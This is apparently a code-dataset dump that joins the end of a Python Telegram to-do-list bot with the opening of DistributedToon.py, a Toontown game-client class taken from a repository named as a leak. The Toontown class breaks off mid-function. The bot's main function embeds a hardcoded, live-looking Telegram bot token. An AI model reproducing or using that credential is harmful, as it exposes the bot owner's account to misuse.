file_out = open(argv[1],"w")
to_remove = " ".join(args)
print(to_remove)
if to_remove in todo_list :
todo_list.remove(to_remove)
update.message.reply_text("The task was succesfully removed")
else :
update.message.reply_text("The task was not found")
for task in todo_list:
file_out.write(task + "\n")
file_out.close()
def remove_all_task(bot,update,args) :
file_task = open(argv[1])
todo_list = file_task.read().splitlines()
file_task.close()
to_remove = " ".join(args)
remove_list = []
# utilizzo il for-list per evitare un "out of range"
for action in todo_list:
if action.count(to_remove) != 0:
remove_list.append(action)
if remove_list == []:
update.message.reply_text("The task was not found")
else:
for task in remove_list:
todo_list.remove(task)
update.message.reply_text("Task removed: ")
update.message.reply_text(remove_list)
file_task = open(argv[1], "w")
for task in todo_list:
file_task.write(task + "\n")
file_task.close()
def error(bot,update) :
update.message.reply_text("This bot answer only commands")
def main():
'''
it manage a task list implented in a bot
:return:
'''
updater = Updater("718524122:AAF9wHSx1_L2nDelEAqH72-hOUqeJXWaq5M")
dispatcher = updater.dispatcher
start_task_handler = CommandHandler("start", start)
dispatcher.add_handler(start_task_handler)
show_task_handler = CommandHandler("showTasks",show_all_task)
dispatcher.add_handler(show_task_handler)
new_task_handler = CommandHandler("newTask",new_task,pass_args=True)
dispatcher.add_handler(new_task_handler)
remove_task_handler = CommandHandler("removeTask", remove_task, pass_args=True)
dispatcher.add_handler(remove_task_handler)
remove_all_task_handler = CommandHandler("removeAllTask", remove_all_task, pass_args=True)
dispatcher.add_handler(remove_all_task_handler)
error_task_handler = MessageHandler(Filters.text,error)
dispatcher.add_handler(error_task_handler)
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
2512edb155a767f6b7f93f15c00b755dc45ef923
|
8e69eee9b474587925e22413717eb82e4b024360
|
/v1.0.0.test/toontown/toon/DistributedToon.py
|
d9f2c0b0c6e00991934003b88c5ad0845ba6deeb
|
[
"MIT"
] |
permissive
|
TTOFFLINE-LEAK/ttoffline
|
afaef613c36dc3b70514ccee7030ba73c3b5045b
|
bb0e91704a755d34983e94288d50288e46b68380
|
refs/heads/master
| 2020-06-12T15:41:59.411795 | 2020-04-17T08:22:55 | 2020-04-17T08:22:55 | 194,348,185 | 5 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 139,568 |
py
|
from subprocess import Popen
import sys
from panda3d.core import *
from libotp import *
from toontown.toonbase.ToontownGlobals import *
from direct.actor import Actor
from direct.distributed.ClockDelta import *
from direct.interval.IntervalGlobal import *
from otp.otpbase import OTPGlobals
from toontown.toonbase import ToontownGlobals
from direct.directnotify import DirectNotifyGlobal
from otp.avatar import DistributedPlayer
from otp.avatar import Avatar, DistributedAvatar
from otp.speedchat import SCDecoders
from otp.chat import TalkAssistant
import Toon
from direct.task.Task import Task
from direct.distributed import DistributedSmoothNode
from direct.distributed import DistributedObject
from direct.fsm import ClassicFSM
from toontown.hood import ZoneUtil
from toontown.distributed import DelayDelete
from toontown.distributed.DelayDeletable import DelayDeletable
from direct.showbase import PythonUtil
from toontown.catalog import CatalogItemList
from toontown.catalog import CatalogItem
import TTEmote
from toontown.shtiker.OptionsPage import speedChatStyles
from toontown.fishing import FishCollection
from toontown.fishing import FishTank
from toontown.suit import SuitDNA
from toontown.coghq import CogDisguiseGlobals
from toontown.toonbase import TTLocalizer
import Experience, InventoryNew
from toontown.speedchat import TTSCDecoders
from toontown.chat import ToonChatGarbler
from toontown.chat import ResistanceChat
from direct.distributed.MsgTypes import *
from toontown.effects.ScavengerHuntEffects import *
from toontown.estate import FlowerCollection
from toontown.estate import FlowerBasket
from toontown.estate import GardenGlobals
from toontown.estate import DistributedGagTree
from toontown.golf import GolfGlobals
from toontown.parties.PartyGlobals import InviteStatus, PartyStatus
from toontown.parties.PartyInfo import PartyInfo
from toontown.parties.InviteInfo import InviteInfo
from toontown.parties.PartyReplyInfo import PartyReplyInfoBase
from toontown.parties.SimpleMailBase import SimpleMailBase
from toontown.parties import PartyGlobals
from toontown.friends import FriendHandle
import time, operator
from direct.interval.IntervalGlobal import Sequence, Wait, Func, Parallel, SoundInterval
from toontown.distributed import DelayDelete
from otp.otpbase import OTPLocalizer
from direct.showbase.InputStateGlobal import inputState
from toontown.avatar import ToontownAvatarUtils
from toontown.toon import NPCToons
from toontown.battle.BattleProps import globalPropPool
from toontown.char import CharDNA
import random, copy, webbrowser
if base.wantKarts:
from toontown.racing.KartDNA import *
class DistributedToon(DistributedPlayer.DistributedPlayer, Toon.Toon, DistributedSmoothNode.DistributedSmoothNode, DelayDeletable):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedToon')
partyNotify = DirectNotifyGlobal.directNotify.newCategory('DistributedToon_Party')
chatGarbler = ToonChatGarbler.ToonChatGarbler()
gmNameTag = None
def __init__(self, cr, bFake=False):
try:
self.DistributedToon_initialized
return
except:
self.DistributedToon_initialized = 1
DistributedPlayer.DistributedPlayer.__init__(self, cr)
Toon.Toon.__init__(self)
DistributedSmoothNode.DistributedSmoothNode.__init__(self, cr)
self.bFake = bFake
self.kart = None
self._isGM = False
self._gmType = None
self.trophyScore = 0
self.trophyStar = None
self.trophyStarSpeed = 0
self.safeZonesVisited = []
self.NPCFriendsDict = {}
self.earnedExperience = None
self.track = None
self.effect = None
self.maxCarry = 0
self.disguisePageFlag = 0
self.sosPageFlag = 0
self.disguisePage = None
self.sosPage = None
self.gardenPage = None
self.cogTypes = [0,
0,
0,
0]
self.cogLevels = [0,
0,
0,
0]
self.cogParts = [0,
0,
0,
0]
self.cogMerits = [0,
0,
0,
0]
self.savedCheesyEffect = CENormal
self.savedCheesyHoodId = 0
self.savedCheesyExpireTime = 0
if hasattr(base, 'wantPets') and base.wantPets:
self.petTrickPhrases = []
self.petDNA = None
self.customMessages = []
self.resistanceMessages = []
self.cogSummonsEarned = []
self.catalogNotify = ToontownGlobals.NoItems
self.mailboxNotify = ToontownGlobals.NoItems
self.simpleMailNotify = ToontownGlobals.NoItems
self.inviteMailNotify = ToontownGlobals.NoItems
self.catalogScheduleCurrentWeek = 0
self.catalogScheduleNextTime = 0
self.monthlyCatalog = CatalogItemList.CatalogItemList()
self.weeklyCatalog = CatalogItemList.CatalogItemList()
self.backCatalog = CatalogItemList.CatalogItemList()
self.onOrder = CatalogItemList.CatalogItemList(store=CatalogItem.Customization | CatalogItem.DeliveryDate)
self.onGiftOrder = CatalogItemList.CatalogItemList(store=CatalogItem.Customization | CatalogItem.DeliveryDate)
self.mailboxContents = CatalogItemList.CatalogItemList(store=CatalogItem.Customization)
self.deliveryboxContentsContents = CatalogItemList.CatalogItemList(store=CatalogItem.Customization | CatalogItem.GiftTag)
self.awardMailboxContents = CatalogItemList.CatalogItemList(store=CatalogItem.Customization)
self.onAwardOrder = CatalogItemList.CatalogItemList(store=CatalogItem.Customization | CatalogItem.DeliveryDate)
self.splash = None
self.tossTrack = None
self.pieTracks = {}
self.splatTracks = {}
self.lastTossedPie = 0
self.clothesTopsList = []
self.clothesBottomsList = []
self.hatList = []
self.glassesList = []
self.backpackList = []
self.shoesList = []
self.tunnelTrack = None
self.tunnelPivotPos = [-14, -6, 0]
self.tunnelCenterOffset = 9.0
self.tunnelCenterInfluence = 0.6
self.pivotAngle = 135
self.posIndex = 0
self.houseId = 0
self.money = 0
self.bankMoney = 0
self.maxMoney = 0
self.maxBankMoney = 0
self.emblems = [0, 0]
self.maxNPCFriends = 16
self.petId = 0
self.bPetTutorialDone = False
self.bFishBingoTutorialDone = False
self.bFishBingoMarkTutorialDone = False
self.accessories = []
if base.wantKarts:
self.kartDNA = [
-1] * getNumFields()
self.flowerCollection = None
self.shovel = 0
self.shovelSkill = 0
self.shovelModel = None
self.wateringCan = 0
self.wateringCanSkill = 0
self.wateringCanModel = None
self.gardenSpecials = []
self.unlimitedSwing = 0
self.soundSequenceList = []
self.boardingParty = None
self.__currentDialogue = None
self.mail = None
self.invites = []
self.hostedParties = []
self.partiesInvitedTo = []
self.partyReplyInfoBases = []
self.gmState = 0
self.gmNameTagEnabled = 0
self.gmNameTagColor = 'whiteGM'
self.gmNameTagString = ''
self._lastZombieContext = None
self.carActive = False
self.carInterest = None
self.activeIntervals = {}
self.locked = False
self.muted = False
self.transitioning = False
self.cogIndex = -1
self.immortalMode = False
self.unlimitedGags = False
self.instaKill = False
self.cage = None
self.cageCameraNode = None
self.unlocks = []
return
def disable(self):
for soundSequence in self.soundSequenceList:
soundSequence.finish()
self.soundSequenceList = []
self._stopZombieCheck()
if self.boardingParty:
self.boardingParty.demandDrop()
self.boardingParty = None
self.carActive = False
self.updateCarActive()
self.ignore('clientCleanup')
self.stopAnimations()
self.clearCheesyEffect()
self.stopBlink()
self.stopSmooth()
self.stopLookAroundNow()
self.setGhostMode(0)
if self.track != None:
self.track.finish()
DelayDelete.cleanupDelayDeletes(self.track)
self.track = None
if self.effect != None:
self.effect.destroy()
self.effect = None
if self.splash != None:
self.splash.destroy()
self.splash = None
if self.emote != None:
self.emote.finish()
self.emote = None
self.cleanupPies()
if self.isDisguised:
self.takeOffSuit()
if self.tunnelTrack:
self.tunnelTrack.finish()
self.tunnelTrack = None
self.setTrophyScore(0)
self.removeGMIcon()
self.cleanupIntervals()
if self.doId in self.cr.toons:
del self.cr.toons[self.doId]
if self.cage:
self.cage.removeNode()
if self.cageCameraNode:
self.cageCameraNode.removeNode()
DistributedPlayer.DistributedPlayer.disable(self)
return
def delete(self):
try:
self.DistributedToon_deleted
except:
self.DistributedToon_deleted = 1
del self.safeZonesVisited
DistributedPlayer.DistributedPlayer.delete(self)
Toon.Toon.delete(self)
DistributedSmoothNode.DistributedSmoothNode.delete(self)
def generate(self):
DistributedPlayer.DistributedPlayer.generate(self)
DistributedSmoothNode.DistributedSmoothNode.generate(self)
self.cr.toons[self.doId] = self
if base.cr.trophyManager != None:
base.cr.trophyManager.d_requestTrophyScore()
self.startBlink()
self.startSmooth()
self.accept('clientCleanup', self._handleClientCleanup)
return
def announceGenerate(self):
DistributedPlayer.DistributedPlayer.announceGenerate(self)
if self.animFSM.getCurrentState().getName() == 'off':
self.setAnimState('neutral')
self._startZombieCheck()
self.updateCarActive()
def _handleClientCleanup(self):
if self.track != None:
DelayDelete.cleanupDelayDeletes(self.track)
return
def setDNAString(self, dnaString):
Toon.Toon.setDNAString(self, dnaString)
base.cr.discordManager.setSmallImage(base.cr.discordManager.getSmallImage())
def setDNA(self, dna):
if base.cr.newsManager:
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.SPOOKY_BLACK_CAT):
black = 26
heads = ['cls',
'css',
'csl',
'cll']
dna.setTemporary(random.choice(heads), black, black, black)
else:
dna.restoreTemporary(self.style)
oldHat = self.getHat()
oldGlasses = self.getGlasses()
oldBackpack = self.getBackpack()
oldShoes = self.getShoes()
self.setHat(0, 0, 0)
self.setGlasses(0, 0, 0)
self.setBackpack(0, 0, 0)
self.setShoes(0, 0, 0)
Toon.Toon.setDNA(self, dna)
self.setHat(*oldHat)
self.setGlasses(*oldGlasses)
self.setBackpack(*oldBackpack)
self.setShoes(*oldShoes)
def setMagicDNA(self, hp):
self.sendUpdate('setMagicDNA', [hp])
def setMagicHeadAccessories(self, h1, h2, g1, g2):
self.sendUpdate('setMagicHeadAccessories', [h1, h2, g1, g2])
def setMagicBodyAccessories(self, b1, b2, s1, s2):
self.sendUpdate('setMagicBodyAccessories', [b1, b2, s1, s2])
def setHat(self, idx, textureIdx, colorIdx):
Toon.Toon.setHat(self, idx, textureIdx, colorIdx)
def setGlasses(self, idx, textureIdx, colorIdx):
Toon.Toon.setGlasses(self, idx, textureIdx, colorIdx)
def setBackpack(self, idx, textureIdx, colorIdx):
Toon.Toon.setBackpack(self, idx, textureIdx, colorIdx)
def setShoes(self, idx, textureIdx, colorIdx):
Toon.Toon.setShoes(self, idx, textureIdx, colorIdx)
def setGM(self, type):
wasGM = self._isGM
self._isGM = type != 0
self._gmType = None
if self._isGM:
self._gmType = type - 1
if self._isGM != wasGM:
self._handleGMName()
return
def setExperience(self, experience):
self.experience = Experience.Experience(experience, self)
if self.inventory:
self.inventory.updateGUI()
def setInventory(self, inventoryNetString):
if not self.inventory:
self.inventory = InventoryNew.InventoryNew(self, inventoryNetString)
self.inventory.updateInvString(inventoryNetString)
def setLastHood(self, lastHood):
self.lastHood = lastHood
def setBattleId(self, battleId):
self.battleId = battleId
messenger.send('ToonBattleIdUpdate', [self.doId])
def b_setSCToontask(self, taskId, toNpcId, toonProgress, msgIndex):
self.setSCToontask(taskId, toNpcId, toonProgress, msgIndex)
self.d_setSCToontask(taskId, toNpcId, toonProgress, msgIndex)
return
def d_setSCToontask(self, taskId, toNpcId, toonProgress, msgIndex):
messenger.send('wakeup')
self.sendUpdate('setSCToontask', [taskId,
toNpcId,
toonProgress,
msgIndex])
def setSCToontask(self, taskId, toNpcId, toonProgress, msgIndex):
if self.doId in base.localAvatar.ignoreList:
return
chatString = TTSCDecoders.decodeTTSCToontaskMsg(taskId, toNpcId, toonProgress, msgIndex)
if chatString:
self.setChatAbsolute(chatString, CFSpeech | CFQuicktalker | CFTimeout)
def b_setSCSinging(self, msgIndex):
self.setSCSinging(msgIndex)
self.d_setSCSinging(msgIndex)
return
def d_setSCSinging(self, msgIndex):
messenger.send('wakeup')
self.sendUpdate('setSCSinging', [msgIndex])
def sendLogSuspiciousEvent(self, msg):
localAvatar.sendUpdate('logSuspiciousEvent', ['%s for %s' % (msg, self.doId)])
def setSCSinging(self, msgIndex):
self.sendUpdate('logSuspiciousEvent', ['invalid msgIndex in setSCSinging: %s from %s' % (msgIndex, self.doId)])
def d_reqSCResistance(self, msgIndex):
messenger.send('wakeup')
nearbyPlayers = self.getNearbyPlayers(ResistanceChat.EFFECT_RADIUS)
self.sendUpdate('reqSCResistance', [msgIndex, nearbyPlayers])
def getNearbyPlayers(self, radius, includeSelf=True):
nearbyToons = []
toonIds = self.cr.getObjectsOfExactClass(DistributedToon)
for toonId, toon in toonIds.items():
if toon is not self:
dist = toon.getDistance(self)
if dist < radius:
nearbyToons.append(toonId)
if includeSelf:
nearbyToons.append(self.doId)
return nearbyToons
def setSCResistance(self, msgIndex, nearbyToons=[]):
chatString = TTSCDecoders.decodeTTSCResistanceMsg(msgIndex)
if chatString:
self.setChatAbsolute(chatString, CFSpeech | CFTimeout)
ResistanceChat.doEffect(msgIndex, self, nearbyToons)
def d_battleSOS(self, requesterId, sendToId=None):
if not base.cr.isFriend(self.sendToId):
return
self.sendUpdate('battleSOS', [requesterId], sendToId)
def battleSOS(self, requesterId):
if not base.cr.isFriend(requesterId):
return
else:
avatar = base.cr.identifyAvatar(requesterId)
if isinstance(avatar, DistributedToon) or isinstance(avatar, FriendHandle.FriendHandle):
self.setSystemMessage(requesterId, TTLocalizer.MovieSOSWhisperHelp % avatar.getName(), whisperType=WhisperPopup.WTBattleSOS)
elif avatar is not None:
self.notify.warning('got battleSOS from non-toon %s' % requesterId)
return
def getDialogueArray(self, *args):
return Toon.Toon.getDialogueArray(self, *args)
def setDefaultShard(self, shard):
self.defaultShard = shard
def setDefaultZone(self, zoneId):
if zoneId >= 30000 and zoneId < 40000:
zoneId = zoneId + 2000
try:
hoodPhase = base.cr.hoodMgr.getPhaseFromHood(zoneId)
except:
self.defaultZone = ToontownCentral
return
if ZoneUtil.getCanonicalHoodId(zoneId) == FunnyFarm:
self.defaultZone = ToontownCentral
return
if not base.cr.isPaid() or launcher and not launcher.getPhaseComplete(hoodPhase):
self.defaultZone = ToontownCentral
else:
self.defaultZone = zoneId
def setShtickerBook(self, string):
pass
def setAsGM(self, state):
self.notify.debug('Setting GM State: %s' % state)
DistributedPlayer.DistributedPlayer.setAsGM(self, state)
def d_updateGMNameTag(self):
self.refreshName()
def updateGMNameTag(self, tagString, color, state):
try:
unicode(tagString, 'utf-8')
except UnicodeDecodeError:
self.sendUpdate('logSuspiciousEvent', ['invalid GM name tag: %s from %s' % (tagString, self.doId)])
return
def refreshName(self):
return
self.notify.debug('Refreshing GM Nametag String: %s Color: %s State: %s' % (self.gmNameTagString, self.gmNameTagColor, self.gmNameTagEnabled))
if hasattr(self, 'nametag') and self.gmNameTagEnabled:
self.setDisplayName(self.gmNameTagString)
self.setName(self.gmNameTagString)
self.trophyStar1 = loader.loadModel('models/misc/smiley')
self.trophyStar1.reparentTo(self.nametag.getNameIcon())
self.trophyStar1.setScale(1)
self.trophyStar1.setZ(2.25)
self.trophyStar1.setColor(Vec4(0.75, 0.75, 0.75, 0.75))
self.trophyStar1.setTransparency(1)
self.trophyStarSpeed = 15
else:
taskMgr.add(self.__refreshNameCallBack, self.uniqueName('refreshNameCallBack'))
def __starSpin1(self, task):
now = globalClock.getFrameTime()
r = now * 90 % 360.0
self.trophyStar1.setH(r)
return Task.cont
def __refreshNameCallBack(self, task):
if hasattr(self, 'nametag') and self.nametag.getName() != '':
self.refreshName()
return Task.done
else:
return Task.cont
def setTalk(self, fromAV, fromAC, avatarName, chat, mods, flags, raw):
if base.cr.avatarFriendsManager.checkIgnored(fromAV):
self.d_setWhisperIgnored(fromAV)
return
else:
if fromAV in self.ignoreList:
self.d_setWhisperIgnored(fromAV)
return
if base.config.GetBool('want-sleep-reply-on-regular-chat', 0):
if base.localAvatar.sleepFlag == 1:
self.sendUpdate('setSleepAutoReply', [base.localAvatar.doId], fromAV)
newText, scrubbed = self.scrubTalk(chat, mods, raw)
self.displayTalk(newText)
base.talkAssistant.receiveOpenTalk(fromAV, avatarName, fromAC, None, newText)
return
def isAvFriend(self, avId):
return base.cr.isFriend(avId) or base.cr.playerFriendsManager.isAvatarOwnerPlayerFriend(avId)
def setTalkWhisper(self, fromAV, fromAC, avatarName, chat, mods, flags, raw):
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromAV):
return
if base.cr.avatarFriendsManager.checkIgnored(fromAV):
self.d_setWhisperIgnored(fromAV)
return
else:
if fromAV in self.ignoreList:
self.d_setWhisperIgnored(fromAV)
return
if base.config.GetBool('ignore-whispers', 0):
return
if base.localAvatar.sleepFlag == 1:
if not base.cr.identifyAvatar(fromAV) == base.localAvatar:
self.sendUpdate('setSleepAutoReply', [base.localAvatar.doId], fromAV)
newText, scrubbed = self.scrubTalk(chat, mods, raw)
self.displayTalkWhisper(fromAV, avatarName, chat, mods, raw)
base.talkAssistant.receiveWhisperTalk(fromAV, avatarName, fromAC, None, self.doId, self.getName(), newText)
return
def setSleepAutoReply(self, fromId):
pass
def _isValidWhisperSource(self, source):
return isinstance(source, FriendHandle.FriendHandle) or isinstance(source, DistributedToon)
def setWhisperSCEmoteFrom(self, fromId, emoteId):
handle = base.cr.identifyFriend(fromId)
if handle == None:
return
else:
if not self._isValidWhisperSource(handle):
self.notify.warning('setWhisperSCEmoteFrom non-toon %s' % fromId)
return
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromId):
return
if base.cr.avatarFriendsManager.checkIgnored(fromId):
self.d_setWhisperIgnored(fromId)
return
if base.localAvatar.sleepFlag == 1:
if not base.cr.identifyAvatar(fromId) == base.localAvatar:
self.sendUpdate('setSleepAutoReply', [base.localAvatar.doId], fromId)
chatString = SCDecoders.decodeSCEmoteWhisperMsg(emoteId, handle.getName())
if chatString:
self.displayWhisper(fromId, chatString, WhisperPopup.WTEmote)
base.talkAssistant.receiveAvatarWhisperSpeedChat(TalkAssistant.SPEEDCHAT_EMOTE, emoteId, fromId)
return
def setWhisperSCFrom(self, fromId, msgIndex):
handle = base.cr.identifyFriend(fromId)
if handle == None:
return
else:
if not self._isValidWhisperSource(handle):
self.notify.warning('setWhisperSCFrom non-toon %s' % fromId)
return
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromId):
return
if base.cr.avatarFriendsManager.checkIgnored(fromId):
self.d_setWhisperIgnored(fromId)
return
if fromId in self.ignoreList:
self.d_setWhisperIgnored(fromId)
return
if base.localAvatar.sleepFlag == 1:
if not base.cr.identifyAvatar(fromId) == base.localAvatar:
self.sendUpdate('setSleepAutoReply', [base.localAvatar.doId], fromId)
chatString = SCDecoders.decodeSCStaticTextMsg(msgIndex)
if chatString:
self.displayWhisper(fromId, chatString, WhisperPopup.WTQuickTalker)
base.talkAssistant.receiveAvatarWhisperSpeedChat(TalkAssistant.SPEEDCHAT_NORMAL, msgIndex, fromId)
return
def setWhisperSCCustomFrom(self, fromId, msgIndex):
handle = base.cr.identifyFriend(fromId)
if handle == None:
return
else:
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromId):
return
return DistributedPlayer.DistributedPlayer.setWhisperSCCustomFrom(self, fromId, msgIndex)
def whisperSCToontaskTo(self, taskId, toNpcId, toonProgress, msgIndex, sendToId):
messenger.send('wakeup')
self.sendUpdate('setWhisperSCToontaskFrom', [self.doId,
taskId,
toNpcId,
toonProgress,
msgIndex], sendToId)
def setWhisperSCToontaskFrom(self, fromId, taskId, toNpcId, toonProgress, msgIndex):
sender = base.cr.identifyFriend(fromId)
if sender == None:
return
else:
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromId):
return
if fromId in self.ignoreList:
self.d_setWhisperIgnored(fromId)
chatString = TTSCDecoders.decodeTTSCToontaskMsg(taskId, toNpcId, toonProgress, msgIndex)
if chatString:
self.displayWhisper(fromId, chatString, WhisperPopup.WTQuickTalker)
return
def setMaxNPCFriends(self, max):
max &= 32767
if max != self.maxNPCFriends:
self.maxNPCFriends = max
messenger.send(self.uniqueName('maxNPCFriendsChange'))
else:
self.maxNPCFriends = max
def getMaxNPCFriends(self):
return self.maxNPCFriends
def getNPCFriendsDict(self):
return self.NPCFriendsDict
def setNPCFriendsDict(self, NPCFriendsList):
NPCFriendsDict = {}
for friendPair in NPCFriendsList:
npcFriends = NPCToons.loadCards(returnDict=True)
if friendPair[0] not in npcFriends:
continue
NPCFriendsDict[friendPair[0]] = friendPair[1]
self.NPCFriendsDict = NPCFriendsDict
def setMaxAccessories(self, max):
self.maxAccessories = max
def getMaxAccessories(self):
return self.maxAccessories
def setHatList(self, clothesList):
self.hatList = clothesList
def getHatList(self):
return self.hatList
def setGlassesList(self, clothesList):
self.glassesList = clothesList
def getGlassesList(self):
return self.glassesList
def setBackpackList(self, clothesList):
self.backpackList = clothesList
def getBackpackList(self):
return self.backpackList
def setShoesList(self, clothesList):
self.shoesList = clothesList
def getShoesList(self):
return self.shoesList
def isTrunkFull(self, extraAccessories=0):
numAccessories = (len(self.hatList) + len(self.glassesList) + len(self.backpackList) + len(self.shoesList)) / 3
return numAccessories + extraAccessories >= self.maxAccessories
def setMaxClothes(self, max):
self.maxClothes = max
def getMaxClothes(self):
return self.maxClothes
def getClothesTopsList(self):
return self.clothesTopsList
def setClothesTopsList(self, clothesList):
self.clothesTopsList = clothesList
def getClothesBottomsList(self):
return self.clothesBottomsList
def setClothesBottomsList(self, clothesList):
self.clothesBottomsList = clothesList
def catalogGenClothes(self, avId):
if avId == self.doId:
self.generateToonClothes()
self.loop('neutral')
def catalogGenAccessories(self, avId):
if avId == self.doId:
self.generateToonAccessories()
self.loop('neutral')
def isClosetFull(self, extraClothes=0):
numClothes = len(self.clothesTopsList) / 4 + len(self.clothesBottomsList) / 2
return numClothes + extraClothes >= self.maxClothes
def setMaxHp(self, hitPoints):
DistributedPlayer.DistributedPlayer.setMaxHp(self, hitPoints)
if self.inventory:
self.inventory.updateGUI()
def setHp(self, hp):
DistributedPlayer.DistributedPlayer.setHp(self, hp)
if self.isDisguised:
self.suit.currHP = self.hp
self.suit.maxHP = self.maxHp
if self.maxHp == self.hp:
self.suit.corpMedallion.show()
self.suit.healthBar.hide()
else:
self.suit.corpMedallion.hide()
self.suit.healthBar.show()
self.suit.updateHealthBar(self.hp, True, True)
def died(self):
messenger.send(self.uniqueName('died'))
if self.isLocal():
target_sz = ZoneUtil.getSafeZoneId(self.defaultZone)
place = self.cr.playGame.getPlace()
if place and place.fsm:
place.fsm.request('died', [
{'loader': ZoneUtil.getLoaderName(target_sz), 'where': ZoneUtil.getWhereName(target_sz, 1),
'how': 'teleportIn',
'hoodId': target_sz,
'zoneId': target_sz,
'shardId': None,
'avId': -1,
'battle': 1}])
return
def setInterface(self, string):
pass
def setZonesVisited(self, hoods):
self.safeZonesVisited = hoods
def setHoodsVisited(self, hoods):
self.hoodsVisited = hoods
if ToontownGlobals.SellbotHQ in hoods or ToontownGlobals.CashbotHQ in hoods or ToontownGlobals.LawbotHQ in hoods:
self.setDisguisePageFlag(1)
def wrtReparentTo(self, parent):
DistributedSmoothNode.DistributedSmoothNode.wrtReparentTo(self, parent)
def setTutorialAck(self, tutorialAck):
self.tutorialAck = tutorialAck
def setEarnedExperience(self, earnedExp):
self.earnedExperience = earnedExp
def b_setTunnelIn(self, endX, tunnelOrigin):
timestamp = globalClockDelta.getFrameNetworkTime()
pos = tunnelOrigin.getPos(render)
h = tunnelOrigin.getH(render)
self.setTunnelIn(timestamp, endX, pos[0], pos[1], pos[2], h)
self.d_setTunnelIn(timestamp, endX, pos[0], pos[1], pos[2], h)
def d_setTunnelIn(self, timestamp, endX, x, y, z, h):
self.sendUpdate('setTunnelIn', [timestamp,
endX,
x,
y,
z,
h])
def setTunnelIn(self, timestamp, endX, x, y, z, h):
t = globalClockDelta.networkToLocalTime(timestamp)
self.handleTunnelIn(t, endX, x, y, z, h)
def getTunnelInToonTrack(self, endX, tunnelOrigin):
pivotNode = tunnelOrigin.attachNewNode(self.uniqueName('pivotNode'))
pivotNode.setPos(*self.tunnelPivotPos)
pivotNode.setHpr(0, 0, 0)
pivotY = pivotNode.getY(tunnelOrigin)
endY = 5.0
straightLerpDur = abs(endY - pivotY) / ToonForwardSpeed
pivotDur = 2.0
pivotLerpDur = pivotDur * (90.0 / self.pivotAngle)
self.reparentTo(pivotNode)
self.setPos(0, 0, 0)
self.setX(tunnelOrigin, endX)
targetX = self.getX()
self.setX(self.tunnelCenterOffset + (targetX - self.tunnelCenterOffset) * (1.0 - self.tunnelCenterInfluence))
self.setHpr(tunnelOrigin, 0, 0, 0)
pivotNode.setH(-self.pivotAngle)
return Sequence(Wait(0.8), Parallel(LerpHprInterval(pivotNode, pivotDur, hpr=Point3(0, 0, 0), name=self.uniqueName('tunnelInPivot')), Sequence(Wait(pivotDur - pivotLerpDur), LerpPosInterval(self, pivotLerpDur, pos=Point3(targetX, 0, 0), name=self.uniqueName('tunnelInPivotLerpPos')))), Func(self.wrtReparentTo, render), Func(pivotNode.removeNode), LerpPosInterval(self, straightLerpDur, pos=Point3(endX, endY, 0.1), other=tunnelOrigin, name=self.uniqueName('tunnelInStraightLerp')))
def handleTunnelIn(self, startTime, endX, x, y, z, h):
self.stopSmooth()
tunnelOrigin = render.attachNewNode('tunnelOrigin')
tunnelOrigin.setPosHpr(x, y, z, h, 0, 0)
self.tunnelTrack = Sequence(self.getTunnelInToonTrack(endX, tunnelOrigin), Func(tunnelOrigin.removeNode), Func(self.startSmooth))
tOffset = globalClock.getFrameTime() - (startTime + self.smoother.getDelay())
if tOffset < 0.0:
self.tunnelTrack = Sequence(Wait(-tOffset), self.tunnelTrack)
self.tunnelTrack.start()
else:
self.tunnelTrack.start(tOffset)
def b_setTunnelOut(self, startX, startY, tunnelOrigin):
timestamp = globalClockDelta.getFrameNetworkTime()
pos = tunnelOrigin.getPos(render)
h = tunnelOrigin.getH(render)
self.setTunnelOut(timestamp, startX, startY, pos[0], pos[1], pos[2], h)
self.d_setTunnelOut(timestamp, startX, startY, pos[0], pos[1], pos[2], h)
def d_setTunnelOut(self, timestamp, startX, startY, x, y, z, h):
self.sendUpdate('setTunnelOut', [timestamp,
startX,
startY,
x,
y,
z,
h])
def setTunnelOut(self, timestamp, startX, startY, x, y, z, h):
t = globalClockDelta.networkToLocalTime(timestamp)
self.handleTunnelOut(t, startX, startY, x, y, z, h)
def getTunnelOutToonTrack(self, startX, startY, tunnelOrigin):
startPos = self.getPos(tunnelOrigin)
startHpr = self.getHpr(tunnelOrigin)
reducedAvH = PythonUtil.fitDestAngle2Src(startHpr[0], 180)
pivotNode = tunnelOrigin.attachNewNode(self.uniqueName('pivotNode'))
pivotNode.setPos(*self.tunnelPivotPos)
pivotNode.setHpr(0, 0, 0)
pivotY = pivotNode.getY(tunnelOrigin)
straightLerpDur = abs(startY - pivotY) / ToonForwardSpeed
pivotDur = 2.0
pivotLerpDur = pivotDur * (90.0 / self.pivotAngle)
def getTargetPos(self=self):
pos = self.getPos()
return Point3(self.tunnelCenterOffset + (pos[0] - self.tunnelCenterOffset) * (1.0 - self.tunnelCenterInfluence), pos[1], pos[2])
return Sequence(Parallel(LerpPosInterval(self, straightLerpDur, pos=Point3(startX, pivotY, 0.1), startPos=startPos, other=tunnelOrigin, name=self.uniqueName('tunnelOutStraightLerp')), LerpHprInterval(self, straightLerpDur * 0.8, hpr=Point3(reducedAvH, 0, 0), startHpr=startHpr, other=tunnelOrigin, name=self.uniqueName('tunnelOutStraightLerpHpr'))), Func(self.wrtReparentTo, pivotNode), Parallel(LerpHprInterval(pivotNode, pivotDur, hpr=Point3(-self.pivotAngle, 0, 0), name=self.uniqueName('tunnelOutPivot')), LerpPosInterval(self, pivotLerpDur, pos=getTargetPos, name=self.uniqueName('tunnelOutPivotLerpPos'))), Func(self.wrtReparentTo, render), Func(pivotNode.removeNode))
def handleTunnelOut(self, startTime, startX, startY, x, y, z, h):
tunnelOrigin = render.attachNewNode('tunnelOrigin')
tunnelOrigin.setPosHpr(x, y, z, h, 0, 0)
self.tunnelTrack = Sequence(Func(self.stopSmooth), self.getTunnelOutToonTrack(startX, startY, tunnelOrigin), Func(self.detachNode), Func(tunnelOrigin.removeNode))
tOffset = globalClock.getFrameTime() - (startTime + self.smoother.getDelay())
if tOffset < 0.0:
